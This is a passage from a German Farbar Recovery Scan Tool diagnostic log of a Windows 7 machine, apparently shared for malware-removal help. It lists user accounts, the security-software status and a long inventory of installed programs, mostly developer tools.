C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-06 00:52

==================== Ende von FRST.txt ============================
         
Addition.txt

Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 07-05-2017
durchgeführt von Hamlet (08-05-2017 10:19:13)
Gestartet von C:\Users\Hamlet\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2013-07-19 10:53:02)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-2254724001-3966478908-1047364323-500 - Administrator - Enabled) => C:\Users\Administrator
Entwickler (S-1-5-21-2254724001-3966478908-1047364323-1012 - Limited - Enabled) => C:\Users\Entwickler
Gast (S-1-5-21-2254724001-3966478908-1047364323-501 - Limited - Disabled)
Hamlet (S-1-5-21-2254724001-3966478908-1047364323-1001 - Administrator - Enabled) => C:\Users\Hamlet
IUSR_Servs (S-1-5-21-2254724001-3966478908-1047364323-1016 - Limited - Enabled)
UpdatusUser (S-1-5-21-2254724001-3966478908-1047364323-1003 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

4500_G510gm_Help (x32 Version: 000.0.440.000 - Hewlett-Packard) Hidden
4500G510gm (x32 Version: 000.0.423.000 - Hewlett-Packard) Hidden
4500G510gm_Software_Min (x32 Version: 000.0.423.000 - Hewlett-Packard) Hidden
64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
7-Zip 16.02 (x64 edition) (HKLM\...\{23170F69-40C1-2702-1602-000001000000}) (Version: 16.02.00.0 - Igor Pavlov)
ACDSee 4.0 PowerPack Suite (HKLM-x32\...\{92E64C51-5096-442F-9A44-61CB2941391D}) (Version: 4.00.0000 - ACD Systems Ltd)
Active@ ISO Burner (HKLM-x32\...\{7694E0B1-2332-448B-9235-929F84B41E3F}) (Version: 2.5.1 - LSoft Technologies)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe CSI CS4 x64 (Version: 1 - Adobe Systems Incorporated) Hidden
Adobe Dreamweaver CS4 (HKLM-x32\...\Adobe_acce07fd2c8fe7f9e3f26243e626578) (Version: 10.0 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)
Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Audacity 2.0.4 (HKLM-x32\...\Audacity_is1) (Version: 2.0.4 - Audacity Team)
Audiograbber 1.83 SE  (HKLM-x32\...\Audiograbber) (Version: 1.83 SE - Audiograbber Deutschland)
AutoIt v3.3.14.1 (HKLM-x32\...\AutoItv3) (Version: 3.3.14.1 - AutoIt Team)
AutoIT-Recorder (HKLM-x32\...\{6D580F34-B267-4914-816D-AF0AF362CA6D}) (Version: 1.0.1 - INET-Consulting)
AVM FRITZ!Box Dokumentation (HKLM-x32\...\AVMFBox) (Version:  - AVM Berlin)
BDE_ENT (x32 Version: 5.1.1 - Borland Software Corp.) Hidden
Boost Libraries for C++Builder 2009 (HKLM-x32\...\Boost Libraries for C++Builder 2009) (Version:  - CodeGear)
Boost Libraries for C++Builder 2009 (x32 Version: 6.0 - CodeGear) Hidden
Boost Libraries for Embarcadero Developer Tools (HKLM-x32\...\Boost Libraries for Embarcadero Developer Tools) (Version: 15.0 - Embarcadero Technologies, Inc.)
Boost Libraries for Embarcadero Developer Tools (x32 Version: 15.0 - Embarcadero Technologies, Inc.) Hidden
BufferChm (x32 Version: 130.0.331.000 - Hewlett-Packard) Hidden
calibre 64bit (HKLM\...\{681661E2-CB98-400A-BAC5-F573BE396948}) (Version: 2.82.0 - Kovid Goyal)
CamStudio 2.7.2 (HKLM\...\{04B83666-3A62-452B-85D3-70F8117F2329}_is1) (Version: 2.7.2 - CamStudio Open Source)
CamStudio Lossless Codec v1.5 (HKLM-x32\...\camcodec) (Version: 1.5 - CamStudio)
CamStudio version 2.7 (HKLM-x32\...\{04B83666-3A62-452B-85D3-70F8117F2329}_is1) (Version: 2.7 - CamStudio Open Source)
Canon MP Navigator EX 2.0 (HKLM-x32\...\MP Navigator EX 2.0) (Version:  - )
Canon Utilities Solution Menu (HKLM-x32\...\CanonSolutionMenu) (Version:  - )
CanoScan LiDE 100 Scanner Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_CNQ2413) (Version:  - )
CodeGear Delphi and C++Builder 2009 Database Pack (HKLM-x32\...\CodeGear Delphi and C++Builder 2009 Database Pack) (Version:  - CodeGear)
CodeGear Delphi and C++Builder 2009 Database Pack (x32 Version: 6.0 - CodeGear) Hidden
CodeGear Delphi and C++Builder 2009 Help System (HKLM-x32\...\CodeGear Delphi and C++Builder 2009 Help System) (Version:  - CodeGear)
CodeGear Delphi and C++Builder 2009 Help System (x32 Version: 6.0 - CodeGear) Hidden
CodeGear RAD Studio 2009 (HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\CodeGear RAD Studio 2009) (Version:  - CodeGear)
CodeGear RAD Studio 2009 (x32 Version: 6.0 - CodeGear) Hidden
CodeSite Express 5 (HKLM-x32\...\CodeSite Express 5_is1) (Version: 5.1.6 - Raize Software, Inc.)
CodeSite Express 5.1 (HKLM-x32\...\CodeSite Express 5.1) (Version: 5.1 - Raize Software, Inc.)
CollabNet Subversion Client 1.7.5 (HKLM-x32\...\CollabNet Subversion Client) (Version: 1.7.5 - CollabNet)
Connect (x32 Version: 1.0.0.1 - Adobe Systems Incorporated) Hidden
Consic FbAdmin 2.1.6 (HKLM-x32\...\Consic FbAdmin_is1) (Version:  - Consic Software Engineering)
Cool Edit 2000 (HKLM-x32\...\Cool Edit 2000) (Version:  - )
Corel Graphics Suite 11 (x32 Version: 11 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 11 (HKLM-x32\...\InstallShield_{1C63DD23-6554-4A1F-8D0D-B5A6B49D8015}) (Version: 11 - Corel Corporation)
CorelDRAW Graphics Suite X5 - Windows Shell Extension 64 Bit (Version: 15.0.487 - Corel Corporation) Hidden
CrypTool 1.4.31 (HKLM-x32\...\CrypTool) (Version: 1.4.31 - )
DelphiZip TZipMaster (HKLM-x32\...\{49BEF1D4-8E4F-4565-87D0-18E5258A3994}}_is1) (Version: 1.9.1.0017 - DelphiZip)
Destinations (x32 Version: 130.0.0.0 - Hewlett-Packard) Hidden
Devart IBDAC 4.1.5 for Embarcadero RAD Studio XE2 (HKLM-x32\...\IBDAC Delphi 16_is1) (Version:  - Devart)
Devart IBDAC 4.6.12 for CodeGear RAD Studio 2009 (HKLM-x32\...\IBDAC Delphi 12_is1) (Version:  - Devart)
Devenv-Ressourcen für Microsoft Visual Studio 2012 (x32 Version: 11.0.50727 - Microsoft Corporation) Hidden
DeviceDiscovery (x32 Version: 130.0.372.000 - Hewlett-Packard) Hidden
DevJET Documentation Insight Express Edition V2.0.3.251 (HKLM-x32\...\{F62B6FC9-BECA-4209-9F8E-09528DC143BE}_is1) (Version:  - DevJET)
DocMgr (x32 Version: 130.0.000.000 - Ihr Firmenname) Hidden
DocProc (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
DSL-Manager (HKLM-x32\...\{90A455A7-0FC8-4508-B7FA-8F135B8F041A}) (Version:  - )
Dump Truck (HKLM-x32\...\Dump Truck) (Version: 1.2.2.933 - Golden Frog, Inc.)
Embarcadero Delphi and C++Builder XE7 Help System (HKLM-x32\...\Embarcadero Delphi and C++Builder XE7 Help System) (Version: 15.0 - Embarcadero Technologies, Inc.)
Embarcadero Delphi and C++Builder XE7 Help System (x32 Version: 15.0 - Embarcadero Technologies, Inc.) Hidden
Embarcadero ER/Studio v7.6 Developer Edition (HKLM-x32\...\{D295CDD5-51D6-4ECD-AF51-5896C8576DCD}) (Version: 7.6 - Embarcadero Technologies, Inc.)
Embarcadero InterBase XE3  [instance = developer_ibxe3] (HKLM-x32\...\Embarcadero InterBase XE3  [instance = developer_ibxe3]) (Version: Embarcadero InterBase XE3 - Embarcadero Technologies, Inc.)
Embarcadero RAD Studio XE7 (HKLM-x32\...\Embarcadero RAD Studio XE7) (Version: 15.0 - Embarcadero Technologies, Inc.)
Embarcadero RAD Studio XE7 (x32 Version: 15.0 - Embarcadero Technologies, Inc.) Hidden
Erforderliche Komponenten für SSDT  (HKLM-x32\...\{3FF082A7-A5DE-4BDA-B56A-1D2BEFD617A3}) (Version: 11.1.3000.0 - Microsoft Corporation)
FastReport 4 Embarcadero edition (HKLM-x32\...\{B97FD67B-98FA-4ed0-8AFF-4723A92E8407}) (Version: Embarcadero Edition - FastReports)
FastReport 5 Embarcadero edition (HKLM-x32\...\{95C1A9DC-EA30-498e-9531-C7C0F889FB92}) (Version: Embarcadero Edition - FastReports)
Fax (x32 Version: 130.0.418.000 - Hewlett-Packard) Hidden
ffdshow x64 v1.3.4515 [2013-06-12] (HKLM\...\ffdshow64_is1) (Version: 1.3.4515.0 - )
FileZilla Client 3.25.2 (HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\FileZilla Client) (Version: 3.25.2 - Tim Kosse)
Firebird 2.5.2.26540 (x64) (HKLM\...\FBDBServer_2_5_x64_is1) (Version: 2.5.2.26540 - Firebird Project)
Firebird ODBC driver 2.0.2.153 (HKLM\...\Firebird ODBC Driver_is1) (Version: 2.0.2.153 - Firebird Project)
FirebirdClient 3.2.0.0 (HKLM-x32\...\{7D65E5D3-A191-4208-875A-43F149F9C36F}) (Version: 3.2.0.0 - FirebirdSQL)
FreeCommander 2009.02b (HKLM-x32\...\FreeCommander_is1) (Version: 2009.02 - Marek Jasinski)
GExperts for RAD Studio 2009 (HKLM-x32\...\GExpertsRADStudio2009_is1) (Version: 1.37 - GExperts Development Team)
GExperts for RAD Studio XE7 (HKLM-x32\...\GExpertsRADStudioXE7_is1) (Version: 1.37 - GExperts Development Team)
Ghostscript GPL 8.64 (Msi Setup) (HKLM-x32\...\_{06CD45E6-FF5E-4D8E-BC01-B276A90DADF2}) (Version: 8.64 - Corel Corporation)
Ghostscript GPL 8.64 (Msi Setup) (x32 Version: 8.64 - Corel Corporation) Hidden
Git version 2.12.2.2 (HKLM\...\Git_is1) (Version: 2.12.2.2 - The Git Development Community)
Google Drive (HKLM-x32\...\{65EACBB4-B0B8-4A5B-AE46-22DBE15C70B5}) (Version: 1.19.8406.6504 - Google, Inc.)
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.26.9 - Google Inc.) Hidden
GPBaseService2 (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
Gpg4win (2.3.1) (HKLM-x32\...\GPG4Win) (Version: 2.3.1 - The Gpg4win Project)
HK-Software IBExpert Personal Edition (HKLM-x32\...\HK-Software IBExpert Personal Edition_is1) (Version:  - )
Hotfix für Microsoft Visual Studio 2007 Tools for Applications - ENU (KB947789) (HKLM-x32\...\{8E87B944-4815-3C5E-947F-5035C9F64362}.KB947789) (Version: 1 - Microsoft Corporation)
HPProductAssistant (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
HTML Help Workshop (HKLM-x32\...\HTML Help Workshop) (Version:  - )
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.8.0 - LIGHTNING UK!)
InfoPower Grid Essentials for Delphi 2009 (HKLM-x32\...\InfoPower Grid Essentials for Delphi 2009) (Version:  - )
Inkscape 0.48.0 (HKLM-x32\...\Inkscape) (Version: 0.48.0 - )
insight3d 0.3.2 (HKLM-x32\...\{BBBA5E54-5B3C-11DE-BAEA-F9C855D89593}) (Version: 0.3.2.0 - insight3d)
InstallAware 7 (HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\InstallAware 7) (Version:  - InstallAware Software Corporation)
InstallAware 7 (x32 Version: 7.9.7201.2008 - InstallAware Software Corporation) Hidden
IsoBuster 2.8 (HKLM-x32\...\IsoBuster_is1) (Version: 2.8 - Smart Projects)
Java 8 Update 131 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180131F0}) (Version: 8.0.1310.11 - Oracle Corporation)
JOSM 7347 (HKLM-x32\...\OSM) (Version: 7347 - The OpenStreetMap developer community, hxxp://www.openstreetmap.org/)
kuler (x32 Version: 2.0 - Adobe Systems Incorporated) Hidden
madshi's madCollection (HKLM-x32\...\madCollection) (Version:  - )
Malwarebytes Version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Manager (x32 Version: 5.0.15.31893 - 2017 pdfforge GmbH. All rights reserved) Hidden
MarketResearch (x32 Version: 130.0.374.000 - Hewlett-Packard) Hidden
MediaInfo 0.7.72 (HKLM\...\MediaInfo) (Version: 0.7.72 - MediaArea.net)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{5CBFF3F3-2D40-34EE-BCA5-A95BC19E400D}) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5 SDK - DEU Lang Pack (HKLM-x32\...\{98B45D1C-6EB1-460D-A87D-2B60678DC105}) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5 SDK (HKLM-x32\...\{1948E039-EC79-4591-951D-9867A8C14C90}) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft Access database engine 2010 (German) (HKLM\...\{90140000-00D1-0407-1000-0000000FF1CE}) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Access database engine 2010 (German) (HKLM-x32\...\{90140000-00D1-0407-0000-0000000FF1CE}) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft Help Viewer 1.1 Language Pack - DEU (HKLM\...\Microsoft Help Viewer 1.1 Language Pack - DEU) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft Help Viewer 2.0 (HKLM-x32\...\Microsoft Help Viewer 2.0) (Version: 2.0.50727 - Microsoft Corporation)
Microsoft Help Viewer 2.0 Language Pack - DEU (HKLM-x32\...\Microsoft Help Viewer 2.0 Language Pack - DEU) (Version: 2.0.50727 - Microsoft Corporation)
Microsoft Office Professional Edition 2003 (HKLM-x32\...\{90110407-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation)
Microsoft Report Viewer 2012-Laufzeit (HKLM-x32\...\{F2C6E9F1-8F35-42A0-A9CA-E6C94D92A86C}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{5973B12E-5FC1-4EF6-B63B-49C1C4AF2AAA}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft SQL Server 2012 (64-Bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2012 Data-Tier App Framework  (HKLM\...\{01FB748B-6714-410A-A2FC-B76E1D65FA90}) (Version: 11.1.2820.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Data-Tier App Framework  (HKLM-x32\...\{F408C789-83FC-4B7D-A401-7468C8DDBA64}) (Version: 11.1.2820.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB  (HKLM\...\{269A8DF6-BBDA-441F-932B-233F9B746D72}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Management Objects (HKLM-x32\...\{EC75BD20-F9CA-4E77-825F-ABD77E95BE91}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Management Objects (x64) (HKLM\...\{0BF65908-D137-4A9E-B7C9-78F32F74F6FD}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{8E4BA1E5-54E8-41F0-919B-CD875B83CFCE}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 RS-Add-In für SharePoint  (HKLM\...\{F6CBC7E5-D953-47B5-866E-F907CAD562B6}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Setup (English) (HKLM\...\{8CB0713F-CFE0-445D-BCB2-538465860E1A}) (Version: 11.1.3128.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL Compiler Service  (HKLM\...\{8716ABC5-DFC1-4E3E-816A-F0785CC12295}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL ScriptDom  (HKLM\...\{6F173435-3F19-4043-BA3D-A46AA8472859}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 T-SQL-Sprachdienst  (HKLM\...\{D4636DD2-A58C-47BC-BBA6-2E1A978A4BA3}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012-Richtlinien  (HKLM-x32\...\{1D4E365F-F39C-48BA-A995-CAEDFDA29AD1}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server Data Tools – Database Projects – Web installer entry point (HKLM-x32\...\{18558FE7-A87A-4063-9732-95E9E1420828}) (Version: 10.3.20116.0 - Microsoft Corporation)
Microsoft SQL Server Data Tools - DEU (11.1.21208.0) (HKLM-x32\...\{E2531DEE-F98C-46C4-8DAD-22999172D0C5}) (Version: 11.1.21208.0 - Microsoft Corporation)
Microsoft SQL Server Data Tools 2012 (HKLM-x32\...\{4d563512-d8e7-4b16-bec0-b4b14d9925df}) (Version: 11.1.21208.0 - Microsoft Corporation)
Microsoft SQL Server Data Tools Build Utilities - DEU (11.1.21208.0) (HKLM-x32\...\{8BAD1109-8800-4164-A452-7BE81051A02D}) (Version: 11.1.21208.0 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{A282A232-780C-45E2-A5E5-9B61D74DCC6E}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{90ffcee5-8608-4e94-8c18-a4feb4f83fb8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\...\Microsoft Visual J# 2.0 Redistributable Package) (Version:  - Microsoft Corporation)
Microsoft Visual Studio 2010 Shell (Integrated) - DEU (HKLM-x32\...\{B28DC16A-5394-3761-B143-450AE92516BB}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Shell (Isolated) - DEU (HKLM-x32\...\{987AE03F-234A-3623-BD28-6B31FD1D3AB3}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2012 Shell (Integrated) (HKLM-x32\...\{55b160d2-8221-45fd-ab30-4388c69c0f3b}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual Studio 2012 Shell (Integriert) Language Pack - DEU (HKLM-x32\...\{7f73f356-2292-428a-9f1b-7c13f63c7980}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual Studio 2012 Shell (Isolated) (HKLM-x32\...\{d2e0df0f-bf0a-4a89-9530-ebf93842c393}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual Studio 2012 Shell (Isoliert) Language Pack - DEU (HKLM-x32\...\{83fb5592-bb11-4948-b595-ae8bbeb7a570}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM-x32\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Language Pack - DEU (HKLM-x32\...\{8E87B944-4815-3C5E-947F-5035C9F64362}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM-x32\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Runtime Language Pack - DEU (HKLM-x32\...\{76DAEC83-AF7B-333C-8A53-83D7C7D39199}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications Design-Time 3.0 - DEU Language Pack (HKLM-x32\...\{38F74A0E-357B-336C-B614-FE59F4BC62A0}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications Design-Time 3.0 (HKLM-x32\...\{5A03C202-08B4-3F1D-9A60-A4F53EF1B636}) (Version: 10.0.40220 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications x86 Runtime 3.0 - DEU Language Pack (HKLM-x32\...\{96D7B7B6-424F-3A52-8E8D-32CF2615DBD2}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications x86 Runtime 3.0 (HKLM-x32\...\{191A6F65-6878-398D-A272-EF011B80F371}) (Version: 10.0.40220 - Microsoft Corporation)
Microsoft VSS Writer für SQL Server 2012 (HKLM\...\{7647B46D-D4E6-43A5-AC9D-0BAA28C63271}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server 2012 (HKLM-x32\...\{042CA540-1646-4C8B-AA91-A57CCEB6D928}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server 2012 (x64) (HKLM\...\{3E123CBC-07C3-448E-ACE4-F04157099175}) (Version: 11.1.3000.0 - Microsoft Corporation)
Mimo (HKLM-x32\...\Mimo) (Version: 0.2.5 - Mimo, Inc.)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.8.0.6273 - Mozilla)
Mozilla Thunderbird 45.8.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 45.8.0 (x86 de)) (Version: 45.8.0 - Mozilla)
MSI to redistribute MS VS2005 CRT libraries (HKLM-x32\...\{A8D93648-9F7F-407D-915C-62044644C3DA}) (Version: 8.0.50727.42 - The Firebird Project)
MSI to redistribute MS VS2005 CRT libraries (HKLM-x32\...\{EBFC96E5-4409-426E-88B7-650ADB342E78}) (Version: 8.0.50727.42 - The Firebird Project)
MultiPar Version 1.2.7.6 (HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\{AAFC96BF-C615-4D77-9A55-C692A7B26FC5}_is1) (Version: 1.2.7.6 - Yutaka Sawada)
NVIDIA 3D Vision Controller-Treiber 320.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 320.49 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 320.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 320.49 - NVIDIA Corporation)
NVIDIA GeForce Experience 1.5 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 1.5 - NVIDIA Corporation)
NVIDIA Grafiktreiber 320.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 320.49 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.13.0604 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.0604 - NVIDIA Corporation)
OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation)
OpenOffice 4.1.3 Language Pack (German) (HKLM-x32\...\{F656568B-DF59-4EA8-997F-4E293ABC0ABF}) (Version: 4.13.9783 - Apache Software Foundation)
Opera Stable 44.0.2510.1449 (HKLM-x32\...\Opera 44.0.2510.1449) (Version: 44.0.2510.1449 - Opera Software)
Oracle VM VirtualBox 5.1.18 (HKLM\...\{833806DB-0F3D-466E-8353-07283FFBC957}) (Version: 5.1.18 - Oracle Corporation)
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.5.0 - pdfforge GmbH)
Photoshop Camera Raw (x32 Version: 5.0 - Adobe Systems Incorporated) Hidden
Platform (x32 Version: 1.34 - VIA Technologies, Inc.) Hidden
PSPad editor (HKLM-x32\...\PSPad editor_is1) (Version: 4.5.7.2450 - Jan Fiala)
Rave Reports 10.0.0 BE (HKLM-x32\...\Rave Reports 10.0.0 BE_is1) (Version:  - Nevrona Designs)
Rave Reports 7.6.0 BE (HKLM-x32\...\Rave Reports 7.6.0 BE_is1) (Version:  - Nevrona Designs)
Rave Reports 7.6.2 BE (HKLM-x32\...\Rave Reports 7.6.2 BE_is1) (Version:  - Nevrona Designs)
Report Manager 2.9b (HKLM-x32\...\Report Manager_is1) (Version: 2.9b - Toni Martir)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Scan (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
SDL Comp. Suite 9.7/LE for RadStudio 6.0 (HKLM-x32\...\SDL Comp. Suite 9.7/LE for RadStudio 6.0) (Version:  - )
SeaMonkey 2.46 (x86 de) (HKLM-x32\...\SeaMonkey 2.46 (x86 de)) (Version: 2.46 - Mozilla)
